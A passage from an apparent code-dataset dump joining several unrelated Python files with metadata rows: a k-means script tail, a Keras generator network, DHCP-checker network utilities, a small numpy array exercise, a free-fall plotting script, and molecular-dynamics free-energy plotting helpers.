        all_c = x[index_all_c]
        # NOTE(review): if a cluster ends up empty, mean() of an empty
        # slice yields NaN — confirm this cannot happen for this data.
        mean_all_c = all_c.mean(axis=0)
        if np.array_equal(mean_all_c, centroids[c]) is False:
            updated = True
            centroids[c] = mean_all_c
    iteration += 1
    print(iteration)
    # Converged: no centroid changed this round.
    if updated == False:
        break

# Final assignment with the converged centroids.
diff = (x[:, np.newaxis] - centroids)
dist = np.linalg.norm(diff, ord=2, axis=(2))
y_pred = np.argmin(dist, axis=1)

# Visualize true category vs k-means clusters over the first 2 features.
fig, axs = plt.subplots(2)
axs[0].scatter(x[:, 0], x[:, 1], marker='o', c=y, s=25, edgecolor='k')
axs[1].scatter(x[:, 0], x[:, 1], marker='o', c=y_pred, s=25, edgecolor='k')
plt.show()
| true |
222ee35a778a385dbfeef3d30e62c30120ede78e | Python | bardiabarabadi/SingleImage_x264 | /Experiments/Exp_1/pythons/Network.py | UTF-8 | 4,412 | 2.59375 | 3 | [] | no_license | # Modules
from keras.layers.core import Activation
from keras.layers.normalization import BatchNormalization
from keras.layers.convolutional import UpSampling2D
from keras.layers import Input, Concatenate, merge, Add
from keras.layers.convolutional import Conv2D
from keras.models import Model
from keras.layers.advanced_activations import LeakyReLU, PReLU
from keras.layers import add
# Residual block
# Builder helpers for Keras graphs: each takes the current tensor
# ("model"), appends its layers, and returns the resulting tensor.
def res_block_gen(model, kernel_size, filters, strides):
    """Residual block: Conv-BN-PReLU-Conv-BN plus a skip connection."""
    gen = model
    model = Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding="same")(model)
    model = BatchNormalization(momentum=0.5)(model)
    # Using Parametric ReLU (alpha shared across spatial axes).
    model = PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=[1, 2])(model)
    model = Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding="same")(model)
    model = BatchNormalization(momentum=0.5)(model)
    # Additive skip connection around the two conv layers.
    model = add([gen, model])
    return model

def up_sampling_block(model, kernel_size, filters, strides):
    """Conv -> 2x UpSampling -> LeakyReLU (doubles spatial resolution)."""
    # In place of Conv2D and UpSampling2D we can also use Conv2DTranspose
    # (both are used for deconvolution), e.g.:
    # model = Conv2DTranspose(filters=filters, kernel_size=kernel_size, strides=strides, padding="same")(model)
    model = Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding="same")(model)
    model = UpSampling2D(size=2)(model)
    model = LeakyReLU(alpha=0.2)(model)
    return model

def down_sampling_block(model, kernel_size, filters, strides):
    """Conv -> LeakyReLU; any downsampling comes from the given strides."""
    model = Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding="same")(model)
    model = LeakyReLU(alpha=0.2)(model)
    return model

def discriminator_block(model, filters, kernel_size, strides):
    """Conv -> BN -> LeakyReLU, the standard GAN discriminator unit.

    NOTE(review): none of these helpers are referenced by Generator
    below — presumably used elsewhere; confirm before removing.
    """
    model = Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, padding="same")(model)
    model = BatchNormalization(momentum=0.5)(model)
    model = LeakyReLU(alpha=0.2)(model)
    return model
class Generator(object):
    """Builds a residual CNN generator.

    The graph is a chain of 16-filter conv + PReLU blocks joined by
    additive skip connections, a final 3-filter conv, a global skip from
    the input, and a tanh activation — i.e. the network learns a
    residual correction to its input.
    """

    def __init__(self, noise_shape):
        # Input tensor shape, presumably (height, width, channels) —
        # confirm with the training pipeline.
        self.noise_shape = noise_shape

    def generator(self):
        """Assemble and return the (uncompiled) Keras Model."""
        gen_input = Input(shape=self.noise_shape)
        model = Conv2D(filters=16, kernel_size=5, strides=1, padding="same")(gen_input)
        model1 = PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=[1, 2])(
            model)
        model = Conv2D(filters=16, kernel_size=5, strides=1, padding="same")(model1)
        model = PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=[1, 2])(
            model)
        # model2..model5 are the running skip-connection anchors.
        model2 = Add()([model1, model])
        model = Conv2D(filters=16, kernel_size=3, strides=1, padding="same")(model2)
        model = PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=[1, 2])(
            model)
        model3 = Add()([model2, model])
        model = Conv2D(filters=16, kernel_size=3, strides=1, padding="same")(model3)
        model = PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=[1, 2])(
            model)
        model4 = Add()([model3, model])
        model = Conv2D(filters=16, kernel_size=3, strides=1, padding="same")(model4)
        model = PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=[1, 2])(
            model)
        model5 = Add()([model4, model])
        model = Conv2D(filters=16, kernel_size=3, strides=1, padding="same")(model5)
        model = PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=[1, 2])(
            model)
        model = Add()([model5, model])
        # Project back to 3 channels and add the input (global residual).
        model = Conv2D(filters=3, kernel_size=3, strides=1, padding="same")(model)
        model = Add()([model, gen_input]);
        model = Activation('tanh')(model)
        generator_model = Model(inputs=gen_input, outputs=model)
        return generator_model
| true |
d00be95c7be01ced03437647da68c23173742954 | Python | loles/fuelweb | /dhcp-checker/dhcp_checker/utils.py | UTF-8 | 4,593 | 2.734375 | 3 | [] | no_license | # Copyright 2013 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from scapy.all import *
import subprocess
import functools
import re
def command_util(*command):
    """Run *command* and return the Popen handle with piped stdout/stderr."""
    pipe = subprocess.PIPE
    return subprocess.Popen(command, stdout=pipe, stderr=pipe)
def _check_vconfig():
    """Return True when the ``vconfig`` utility is available on PATH."""
    error_output = command_util('which', 'vconfig').stderr.read()
    return not error_output
def check_network_up(iface):
    """Return True if ``ip link show`` reports the link state as UP.

    Bug fix: the original assumed the ``state <WORD>`` token is always
    present in the output; when the regex found no match it crashed with
    AttributeError on ``None.groupdict()``. An unparsable state now
    reports the link as down instead.
    """
    state = command_util('ip', 'link', 'show', iface)
    response = re.search(r'state (?P<state>[A-Z]*)', state.stdout.read())
    if response is None:
        return False
    return response.groupdict()['state'] == 'UP'
def check_iface_exist(iface):
    """Return True when ``ip link show`` produced no error for the iface."""
    result = command_util("ip", "link", "show", iface)
    return not result.stderr.read()
def filtered_ifaces(ifaces):
    """Yield only the interfaces that exist and whose link is up.

    Interfaces failing either check are skipped after a message is
    written to stderr.
    """
    for iface in ifaces:
        if not check_iface_exist(iface):
            sys.stderr.write('Iface {0} does not exist.'.format(iface))
            continue
        if not check_network_up(iface):
            sys.stderr.write('Network for iface {0} is down.'.format(iface))
            continue
        yield iface
def pick_ip(range_start, range_end):
    """Generate dotted-quad IPv4 addresses from range_start (inclusive)
    up to range_end (exclusive).

    Bug fix: the original incremented one octet at a time and advanced to
    the next octet on 255 or on equality with the end octet, which produced
    wrong sequences for any range crossing an octet boundary (e.g.
    192.168.1.254 -> 192.168.2.1). The addresses are now converted to
    32-bit integers and iterated directly, preserving the original
    end-exclusive semantics shown in the doctest.

    >>> next(pick_ip('192.168.1.10','192.168.1.13'))
    '192.168.1.10'
    """
    def to_int(ip_address):
        # Dotted quad -> 32-bit integer.
        first, second, third, fourth = (int(item) for item in ip_address.split('.'))
        return (first << 24) | (second << 16) | (third << 8) | fourth

    def to_str(value):
        # 32-bit integer -> dotted quad.
        return '.'.join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))

    current = to_int(range_start)
    end = to_int(range_end)
    while current < end:
        yield to_str(current)
        current += 1
def format_options(options):
    """Serialize a list of integer DHCP option codes into a string.

    >>> format_options([1, 2, 3])
    '\x01\x02\x03'
    """
    return "".join(map(chr, options))
def _dhcp_options(dhcp_options):
    """Normalize scapy's DHCP option list into (name, value) pairs.

    Scapy returns entries like
    [('message-type', 2), ('name_server', '192.168.0.1', '192.168.0.2'), 'end'];
    plain strings such as 'end' are skipped, single-value tuples collapse
    to their value, and multi-value tuples are kept whole.
    """
    for option in dhcp_options:
        if not isinstance(option, (tuple, list)):
            continue
        header = option[0]
        values = option[1:]
        if len(values) > 1:
            yield (header, option)
        else:
            yield (header, values[0])
def single_format(func):
    """Decorator that flattens a scapy DHCP answer list into dicts.

    The wrapped function must take the interface name as its first
    positional argument and return a scapy answered-list; each response is
    summarized under the keys iface, mac, server_ip, server_id, gateway,
    dport, message, yiaddr.
    """
    @functools.wraps(func)
    def formatter(*args, **kwargs):
        # First positional argument is the interface the query was sent on.
        iface = args[0]
        ans = func(*args, **kwargs)
        columns = ('iface', 'mac', 'server_ip', 'server_id', 'gateway',
                   'dport', 'message', 'yiaddr')
        data = []
        #scapy stores all sequence of requests
        #so ans[0][1] would be response to first request
        for response in ans:
            # response[1] is the reply packet; pull its DHCP options and
            # the interesting header fields from each protocol layer.
            dhcp_options = dict(_dhcp_options(response[1][DHCP].options))
            results = (
                iface, response[1][Ether].src, response[1][IP].src,
                dhcp_options['server_id'], response[1][BOOTP].giaddr,
                response[1][UDP].sport,
                DHCPTypes[dhcp_options['message-type']],
                response[1][BOOTP].yiaddr)
            data.append(dict(zip(columns, results)))
        return data
    return formatter
def multiproc_map(func):
    """Adapter for multiprocessing map, which passes one packed tuple.

    If the first positional argument is a tuple/list, unpack it into
    positional arguments before delegating to ``func``.
    """
    @functools.wraps(func)
    def unpacked(*args, **kwargs):
        if isinstance(args[0], (tuple, list)):
            args = args[0]
        return func(*args, **kwargs)
    return unpacked
def filter_duplicated_results(func):
    """Drop duplicate response dicts produced by ``func``.

    Broadcast queries often return the same answer several times; collapse
    duplicates by hashing each dict's items. The result is a generator of
    dicts and the original ordering is not preserved.
    """
    @functools.wraps(func)
    def deduplicated(*args, **kwargs):
        responses = func(*args, **kwargs)
        unique = set(tuple(item.items()) for item in responses)
        return (dict(pairs) for pairs in unique)
    return deduplicated
| true |
84d8e2cff705ad6b609fe9968df6a2bed63bf54f | Python | Adam110001/Elements_in_Circle_in_Array | /main.py | UTF-8 | 773 | 2.96875 | 3 | [] | no_license | import numpy as np
def minusSide(num):
    """Return the index one step to the left (num - 1)."""
    return num - 1
def plusSide(num):
    """Return the index one step to the right (num + 1)."""
    return num + 1
if __name__ == '__main__':
    # Board size and the column of the top/bottom points of the circle.
    numB = 5
    midP = 2
    if numB == 5:
        z = np.zeros(shape=(numB, numB))
    elif (numB / 2) % 5 == 0:
        # NOTE(review): z is only assigned in these two branches; any other
        # numB would crash below — confirm numB is always 5 here.
        numB += 1
        z = np.zeros(shape=(numB, numB))
    # Top point of the circle.
    z[0][midP] = 1
    # Left and right "cursors" tracing the circle outline row by row.
    numr = midP
    numl = midP
    for i in range(1, numB - 1):
        # one flips to 1 on the row where the outline starts closing in.
        one = 0
        if i == 3:
            one = 1
        if one == 1:
            # Closing half: cursors move back toward the middle column.
            z[i][plusSide(numl)] = 1
            z[i][minusSide(numr)] = 1
        if one == 0:
            # Opening half: cursors move outward and are advanced.
            z[i][minusSide(numl)] = 1
            z[i][plusSide(numr)] = 1
            numl = minusSide(numl)
            numr = plusSide(numr)
    # Bottom point of the circle.
    z[numB - 1][midP] = 1
    print(z)
| true |
562b3fe756ac7c4fa65150b119228260e381297b | Python | remimetzdorff/seconde | /chap/tp_plumarteau/tp_plumarteau_v3/TP Plume/chute_libre.py | UTF-8 | 1,298 | 2.921875 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
#########
# DONNÉES
#########
t = np.array([0.00, 0.45, 0.90, 1.35, 1.80, 2.25, 2.70])
X = np.array([0.00, 0.00, 0.00, 0.00, 0.00, 0.00, 0.00])
Y = np.array([0.00, 0.97, 3.89, 8.75, 15.56, 24.31, 35.00])
####################################################
# REPRÉSENTATION GRAPHIQUE DES POSITIONS SUCCESSIVES
####################################################
fig = plt.figure(figsize=(8,6))
plt.plot(X, Y, "o")
##################
# VECTEURS VITESSE
##################
x = -15
y = 8.75
vx = 17
vy = 5
#plt.quiver(x, y, vx, vy, color="red", angles='xy',scale=1.5, scale_units='xy')
############################
# MISE EN FORME DU GRAPHIQUE
############################
# Titre, nom des axes et légende
plt.title("Chute libre d'une plume dans le vide")
plt.xlabel("Position latérale (m)")
plt.ylabel("Distance depuis le point du laché (m)")
# Décorations
ax = fig.axes[0]
ax.set_yticks(Y)
ax.invert_yaxis()
for i, tick in enumerate(Y):
ax.annotate(r"$M_{%i}$"%(i), (0, tick), color="C0", textcoords="offset points", xytext=(10,2))
ax.plot([-20,20], [35, 35], 'k',zorder=1)
ax.fill_between([-20,20], [35, 35], [40, 40], facecolor='k', alpha=0.25)
ax.annotate("SOL", (-15, 37.5), ha="center", va="center")
plt.show() | true |
0ac3a254d1683263d7ce0cef27a5c58e0d8cb1fe | Python | HWaymentSteele/kinase_msm | /kinase_msm/plotting_utils.py | UTF-8 | 15,245 | 2.75 | 3 | [] | no_license | #!/bin/evn python
import pandas as pd
import numpy as np
from .mdl_analysis import _map_obs_to_state
from scipy.stats import gaussian_kde
"""
set of helper routines to plot things
"""
def scipy_kde(pr_mdl, pop_vector=None, obs=(0,1),
              n_samples=30000, bw_method='scott'):
    """
    Returns a population weighted kernel. Useful for plotting things
    :param pr_mdl: The protein mdl to use
    :param pop_vector: Population vector to use when sampling tic values.
    Defaults to the msm population vector if None is given.
    :param obs: Tuple of either dictionaries or ints. Defaults to 0 and 1st tic
    :param n_samples: The number of samples to use to fit the kde
    :param bw_method: See scipy gaussian kde.
    :return: The fitted kernel and the lists of x and y samples it was
    fit on.
    """
    if pop_vector is None:
        pop_vector = pr_mdl.msm.populations_
    # Draw MSM states proportionally to their equilibrium population.
    states_to_sample = np.random.choice(pr_mdl.n_states_,
                                 n_samples, p=pop_vector)
    if len(obs)!=2:
        raise ValueError("Length of observable needs to be 2")
    if type(obs[0])==int:
        # Integer obs are tic indices into the model's tic dictionary.
        x_obs = pr_mdl.tic_dict[obs[0]]
        y_obs = pr_mdl.tic_dict[obs[1]]
    elif type(obs[0])==dict:
        # Dict obs are assumed to be state-keyed observable dictionaries.
        x_obs = obs[0]
        y_obs = obs[1]
    else:
        raise ValueError("The obs list needs to either be a list of ints(for tics)"
                         "or list of state keyed dictionaries")
    _x_val = []
    _y_val = []
    # Per-state draw counts from the population-weighted sampling above.
    b_c, bin_edges = np.histogram(states_to_sample,
                                  bins=np.arange(pr_mdl.n_states_+1))
    for i in range(pr_mdl.n_states_):
        #have at least 5 samples
        ind = np.random.choice(len(x_obs[i]), np.max((5, b_c[i])))
        _x_val.extend(np.array(x_obs[i])[ind])
        _y_val.extend(np.array(y_obs[i])[ind])
    kernel = gaussian_kde(np.vstack((_x_val,_y_val)), bw_method=bw_method)
    return kernel, _x_val, _y_val
def two_dim_free_energy_kde(pr_mdl, limits_dict={}, pop_vector=None,
                            obs=(0,1), n_samples=30000,
                            bw_method='scott',
                            mlp_fct=1.0):
    """
    Get a free energy landscape for a protein mdl
    :param pr_mdl: The protein mdl under consideration
    :param limits_dict: Limits of the tics being considered
    :param pop_vector: optional population vector. Defaults to the msm pop.
    :param obs: Tuple of either dictionaries or ints. Defaults to 0 and 1st tic
    :param n_samples: Number of samples to use. defaults to 30000
    :param bw_method: Band width method for the kernel. Defaults to "scott"
    :param mlp_fct: Multiplicative factor for the boundaries to allow the "extra"
    edges around the data to make smoother kde plots
    :return: X,Y, and a population weighted free energy map(in kcals/mol). Use
    contourf(X,Y, f) to plot the results. Limit levels to something reasonable
    to account to the non-existant tic spaces

    Note: the default limits_dict={} is never mutated, so sharing the
    default object across calls is harmless here.
    """
    kernel, x, y = scipy_kde(pr_mdl, pop_vector, obs, n_samples, bw_method)

    if not limits_dict and type(obs[0])==int:
        limits_dict = global_tic_boundaries([pr_mdl], obs)

    if type(obs[0])==int:
        # Integer obs index limits_dict by tic index.
        X = mlp_fct*limits_dict[obs[0]]
        Y = mlp_fct*limits_dict[obs[1]]
    else:
        # Dict obs expect limits_dict keyed 0 (x-axis) and 1 (y-axis).
        X = mlp_fct*limits_dict[0]
        Y = mlp_fct*limits_dict[1]

    # Bug fix: the grid size must come from the axis actually selected
    # above. The old code read limits_dict[0].shape unconditionally, which
    # raised KeyError whenever obs held tic indices other than 0
    # (e.g. obs=(2, 3)).
    n_p = X.shape[0]
    X,Y = np.meshgrid(X,Y)
    #create a massive n*2 array of every grid point for one kde evaluation
    positions = np.vstack([X.ravel(), Y.ravel()])
    # -0.6*ln(p) converts the density into kcal/mol at ~300 K.
    return X, Y, -.6 * np.log(kernel.evaluate(positions)).reshape(n_p, n_p)
def global_tic_boundaries(prt_list, tic_list, n_bins=100):
    """For every requested tic, compute n_bins linearly spaced values that
    span the global minimum and maximum of that tic across all proteins.

    :param prt_list: list of proteins loaded using the Protein class
    :param tic_list: list of tic indices to compute for
    :return: dict mapping tic index -> np.linspace(global_min, global_max, n_bins)
    """
    assert isinstance(prt_list, list)

    boundaries = {}
    for tic_index in tic_list:
        lows = [prot.tic_min[tic_index] for prot in prt_list]
        highs = [prot.tic_max[tic_index] for prot in prt_list]
        boundaries[tic_index] = np.linspace(min(lows), max(highs), n_bins)
    return boundaries
def _one_dim_histogram(populations_, x_dict, x_array):
    """Population-weighted 1-D free energy profile.

    Histograms the per-state samples in ``x_dict`` over the bin edges
    ``x_array``, weights each state's normalized histogram by its MSM
    population, and converts the mixture to kcal/mol via -0.6*ln(p).

    Fix: np.histogram's ``normed`` keyword was deprecated and removed in
    modern NumPy; ``density=True`` is the drop-in equivalent.

    :return: (per-state histogram dict, overall free energy array)
    """
    n_bins = len(x_array) - 1
    H_overall = np.zeros(n_bins)
    n_states_ = populations_.shape[0]
    H = {}
    for i in range(n_states_):
        H[i], x = np.histogram(x_dict[i], bins=x_array,
                               density=True)
        H_overall = H_overall + populations_[i]*H[i]
    #convert to kcal/mol
    H_overall = -0.6*np.log(H_overall)
    return H, H_overall
def _two_dim_histogram(populations_, x_obs, y_obs, x_array, y_array):
    """Population-weighted 2-D free energy surface.

    Same scheme as _one_dim_histogram but over np.histogram2d: each state's
    normalized 2-D histogram is weighted by its MSM population and the
    mixture is converted to kcal/mol via -0.6*ln(p).

    Fix: the ``normed`` keyword was deprecated and removed in modern
    NumPy; ``density=True`` is the drop-in equivalent.

    :return: (per-state histogram dict, overall free energy 2-D array)
    """
    n_bins = len(x_array) - 1
    H_overall = np.zeros((n_bins, n_bins))
    n_states_ = populations_.shape[0]
    H = {}
    for i in range(n_states_):
        H[i], x, y = np.histogram2d(x_obs[i], y_obs[i],
                                    bins=[x_array, y_array],
                                    density=True)
        H_overall = H_overall + populations_[i]*H[i]
    #convert to kcal/mol
    H_overall = -0.6*np.log(H_overall)
    return H, H_overall
def tica_histogram(prj, prt, tic_list, x_array=None, y_array=None, n_bins=100):
    """Population-weighted histogram over one or two tics of a protein.

    :param prj: project the protein belongs to (kept for interface
        compatibility; not used directly here)
    :param prt: the protein model
    :param tic_list: single tic index or a list of 1 or 2 tic indices
    :param x_array: optional bin edges for the first tic
    :param y_array: optional bin edges for the second tic
    :param n_bins: number of edges when boundaries are auto-computed
    :return: (per-state histogram dict, overall free energy, x bin centers)

    Bug fixes versus the original:
    - lin_spaced_tic was only computed when x_array was None, so passing
      x_array with y_array=None for two tics raised NameError;
    - c_y was only assigned inside the y_array-is-None branch, so passing
      both arrays for two tics raised NameError.
    """
    # Accept a bare tic index as well as a list.
    if not isinstance(tic_list, list):
        tic_list = [tic_list]

    c_x = prt.tic_dict[tic_list[0]]

    # Compute boundaries once if any axis still needs them.
    need_y = y_array is None and len(tic_list) == 2
    if x_array is None or need_y:
        lin_spaced_tic = global_tic_boundaries([prt], tic_list, n_bins)
    if x_array is None:
        x_array = lin_spaced_tic[tic_list[0]]
    if need_y:
        y_array = lin_spaced_tic[tic_list[1]]
    if len(tic_list) == 2:
        c_y = prt.tic_dict[tic_list[1]]

    x_center = (x_array[:-1] + x_array[1:]) / 2

    if len(tic_list) == 1:
        H, H_overall = _one_dim_histogram(prt.msm.populations_,
                                          c_x, x_array)
    elif len(tic_list) == 2:
        H, H_overall = _two_dim_histogram(prt.msm.populations_,
                                          c_x, c_y, x_array, y_array)
    else:
        raise ValueError("tica_histogram supports only 1 or 2 tics")
    return H, H_overall, x_center
def bootstrap_one_dim_free_energy(prt, obs, bins=100):
    """Free energy profile of an observable with bootstrap error bars.

    For each of the mean and the 95% confidence bounds of the bootstrapped
    state populations, computes a population-weighted free energy profile
    and stacks them in one dataframe (mdl_index in {mean, lower, upper}).

    :param prt: Protein model
    :param obs: dict of per-trajectory observable values
    :param bins: number of bins (int) or precomputed bin edges (array)
    :return: pandas dataframe with columns
        obs_value, free_energy, protein_name, mdl_index
    """
    free_energy = []
    # Bug fix: n_bins was only assigned when precomputed edges were passed
    # in, so the default int path crashed with NameError below. Normalize
    # bins to an edge array first, then derive n_bins unconditionally.
    if bins is None:
        bins = 100
    if isinstance(bins, int):
        max_val = np.max(np.concatenate(list(obs.values())))
        min_val = np.min(np.concatenate(list(obs.values())))
        bins = np.linspace(min_val, max_val, bins)
    n_bins = len(bins) - 1

    state_x_obs_dict = _map_obs_to_state(prt, obs)

    #get the centers stacked nicely, once per bootstrap label
    _labels = ["mean", "lower", "upper"]
    nlbl = len(_labels)
    tic_cen = np.repeat([(bins[:-1] + bins[1:]) / 2],
                        nlbl, axis=0).flatten()
    protein_name = np.repeat(prt.name, nlbl * n_bins).flatten()
    mdl_index = np.array([np.repeat(_labels[i], n_bins)
                          for i in range(nlbl)]).flatten()

    #get per-state histograms (H_msm itself is unused here)
    H, H_msm = _one_dim_histogram(prt.msm.populations_,
                                  state_x_obs_dict, x_array=bins)
    # Mean and 95% confidence bounds of the bootstrapped populations.
    mean_ = prt.bootrap_msm.mapped_populations_mean_
    lower_ = prt.bootrap_msm.mapped_populations_mean_\
             - 1.96*prt.bootrap_msm.mapped_populations_sem_
    upper_ = prt.bootrap_msm.mapped_populations_mean_\
             + 1.96*prt.bootrap_msm.mapped_populations_sem_
    _data = [mean_, lower_, upper_]
    for pop, lbl in zip(_data, _labels):
        H_overall = np.zeros(n_bins)
        assert(len(pop) == len(H.keys()))
        for j in range(prt.n_states_):
            H_overall = H_overall + pop[j]*H[j]
        # Diagnostic: an all-NaN profile means every weighted bin was 0.
        if np.all(np.isnan(H_overall)):
            print(pop, lbl, type(H))
        #convert to free energy (kcal/mol)
        H_overall = -0.6*np.log(H_overall)
        free_energy.extend(H_overall)

    df = pd.DataFrame([list(tic_cen), list(free_energy),
                       list(protein_name), list(mdl_index)]).T
    df.columns = ["obs_value", "free_energy", "protein_name", "mdl_index"]
    return df
def bootstrap_one_dim_tic_free_energy(prj, prt, tic_index, n_bins=100, lin_spaced_tic=None):
    """Free energy along one tic with bootstrap error bars.

    :param prj: Project that the protein is a part of
    :param prt: the protein itself
    :param tic_index: the tic index that is needed
    :param n_bins: number of boundary points when lin_spaced_tic is None
    :param lin_spaced_tic: optional precomputed linearly spaced tic values
    :return: pandas dataframe with one free energy value per bin center for
        each of the bootstrap mean and 5th/95th percentile populations
        (mdl_index in {mean, lower, upper}).

    Bug fix: n_bins was only updated when lin_spaced_tic was passed in; on
    the default path the boundary array holds n_bins points (n_bins-1
    histogram bins) while the repeats and accumulators still used n_bins,
    mismatching array lengths. n_bins is now derived from the edges.
    """
    free_energy = []
    if lin_spaced_tic is None:
        lin_spaced_tic = global_tic_boundaries([prt], [tic_index], n_bins)[tic_index]
    # Number of histogram bins is always edges - 1.
    n_bins = len(lin_spaced_tic) - 1

    #get the centers stacked nicely, once per bootstrap label
    _labels = ["mean", "lower", "upper"]
    nlbl = len(_labels)
    tic_cen = np.repeat([(lin_spaced_tic[:-1] + lin_spaced_tic[1:]) / 2],
                        nlbl, axis=0).flatten()
    protein_name = np.repeat(prt.name, nlbl * n_bins).flatten()
    mdl_index = np.array([np.repeat(_labels[i], n_bins)
                          for i in range(nlbl)]).flatten()

    #get per-state histograms
    H, H_msm, _ = tica_histogram(prj, prt, tic_index, x_array=lin_spaced_tic)
    # Zero populations would make the percentiles meaningless; mask them.
    prt.bootrap_msm.mapped_populations_[prt.bootrap_msm.mapped_populations_ == 0] = np.nan
    mean_ = np.nanmean(prt.bootrap_msm.mapped_populations_, axis=0)
    lower_ = np.nanpercentile(prt.bootrap_msm.mapped_populations_, 5, axis=0)
    upper_ = np.nanpercentile(prt.bootrap_msm.mapped_populations_, 95, axis=0)
    _data = [mean_, lower_, upper_]
    for pop, lbl in zip(_data, _labels):
        H_overall = np.zeros(n_bins)
        for j in range(prt.n_states_):
            H_overall = H_overall + pop[j]*H[j]
        #convert to free energy (kcal/mol)
        H_overall = -0.6*np.log(H_overall)
        free_energy.extend(H_overall)

    df = pd.DataFrame([list(tic_cen), list(free_energy),
                       list(protein_name), list(mdl_index)]).T
    df.columns = ["tic_value", "free_energy", "protein_name", "mdl_index"]
    return df
def one_dim_tic_free_energy(prj, prt, tic_index, n_bins=100 ,
                            lin_spaced_tic=None, errorbars=False, use_mean=True):
    """MSM (maximum likelihood) free energy along one tic.

    :param prj: Project that the protein is a part of
    :param prt: the protein itself
    :param tic_index: the tic index that is needed
    :param n_bins: number of boundary points when lin_spaced_tic is None
    :param lin_spaced_tic: optional precomputed linearly spaced tic values
    :param errorbars: when True, also compute bootstrap mean/lower/upper
        profiles and concatenate them under extra mdl_index labels
    :param use_mean: unused; kept for backwards interface compatibility
    :return: pandas dataframe; the MLE rows carry mdl_index "mle"

    Bug fix: n_bins was only updated when lin_spaced_tic was passed in,
    so the default path produced n_bins-1 free energy values but n_bins
    protein/mdl labels. n_bins is now derived from the edges.
    """
    free_energy = []
    if lin_spaced_tic is None:
        lin_spaced_tic = global_tic_boundaries([prt], [tic_index], n_bins)[tic_index]
    # Number of histogram bins is always edges - 1.
    n_bins = len(lin_spaced_tic) - 1

    #get the centers stacked nicely
    tic_center = np.repeat([(lin_spaced_tic[:-1] + lin_spaced_tic[1:]) / 2],
                           1, axis=0).flatten()
    protein_name = np.repeat(prt.name, n_bins).flatten()
    mdl_index = np.repeat("mle", n_bins).flatten()

    #get data from the maximum likelihood MSM populations
    H, H_msm, _ = tica_histogram(prj, prt, [tic_index], x_array=lin_spaced_tic)
    free_energy.extend(H_msm)
    msm_df = pd.DataFrame([list(tic_center), list(free_energy),
                           list(protein_name), list(mdl_index)]).T
    msm_df.columns = ["tic_value", "free_energy", "protein_name", "mdl_index"]

    if errorbars:
        bootstrap_df = bootstrap_one_dim_tic_free_energy(prj, prt, tic_index, lin_spaced_tic=lin_spaced_tic)
        df = pd.concat([msm_df, bootstrap_df])
        return df
    else:
        return msm_df
def two_dim_tic_free_energy(prj, prt, tic_list, x_array=None, y_array=None, n_bins=100, use_mean=True):
    """Population-weighted 2-D free energy surface over two tics.

    :param prj: project (unused here; kept for interface consistency)
    :param prt: protein model
    :param tic_list: list of exactly two tic indices
    :param x_array: optional bin edges for the first tic
    :param y_array: optional bin edges for the second tic; NOTE(review):
        if x_array is given but y_array is None, y_array stays None and
        the histogram call below will fail — confirm callers always pass
        both or neither
    :param n_bins: number of edges when boundaries are auto-computed
    :param use_mean: weight by the bootstrap mean populations instead of
        the maximum likelihood MSM populations
    :return: 2-D free energy array (kcal/mol)
    """
    #basic sanity tests
    assert(len(tic_list)==2)
    if x_array is None:
        lin_spaced_tic = global_tic_boundaries([prt],tic_list,n_bins)
        x_array = lin_spaced_tic[tic_list[0]]
        y_array = lin_spaced_tic[tic_list[1]]
    else:
        n_bins = len(x_array) - 1
    # NOTE(review): this zeros array is dead code — it is overwritten by
    # the helper's return value below.
    H_overall = np.zeros((n_bins,n_bins))
    #get per-state samples of both tics
    c_x = prt.tic_dict[tic_list[0]]
    c_y = prt.tic_dict[tic_list[1]]
    if use_mean:
        H, H_overall = _two_dim_histogram(prt.bootrap_msm.mapped_populations_mean_,
                                          c_x,c_y,x_array, y_array)
    else:
        H, H_overall = _two_dim_histogram(prt.msm.populations_, c_x, c_y, x_array, y_array)
    return H_overall
def one_dim_free_energy(prt, obs, bins=100, errorbars=False):
    """MSM (maximum likelihood) free energy profile of an observable.

    :param prt: Protein model
    :param obs: dict of per-trajectory observable values
    :param bins: number of bins (int) or precomputed bin edges (array)
    :param errorbars: when True, concatenate the bootstrap mean/lower/upper
        profiles from bootstrap_one_dim_free_energy
    :return: pandas dataframe with columns
        obs_value, free_energy, protein_name, mdl_index ("mle" rows for the
        maximum likelihood profile)

    Bug fix: n_bins was only assigned when precomputed edges were passed
    in, so the default int path crashed with NameError. bins is now
    normalized to an edge array first and n_bins derived from it.
    """
    free_energy = []
    if bins is None:
        bins = 100
    if isinstance(bins, int):
        max_val = np.max(np.concatenate(list(obs.values())))
        min_val = np.min(np.concatenate(list(obs.values())))
        bins = np.linspace(min_val, max_val, bins)
    n_bins = len(bins) - 1

    state_x_obs_dict = _map_obs_to_state(prt, obs)

    #get the centers stacked nicely
    tic_center = np.repeat([(bins[:-1] + bins[1:]) / 2],
                           1, axis=0).flatten()
    protein_name = np.repeat(prt.name, n_bins).flatten()
    mdl_index = np.repeat("mle", n_bins).flatten()

    #get data from the maximum likelihood MSM populations
    H, H_msm = _one_dim_histogram(prt.msm.populations_,
                                  state_x_obs_dict, x_array=bins)
    free_energy.extend(H_msm)
    msm_df = pd.DataFrame([list(tic_center), list(free_energy),
                           list(protein_name), list(mdl_index)]).T
    msm_df.columns = ["obs_value", "free_energy", "protein_name", "mdl_index"]

    if errorbars:
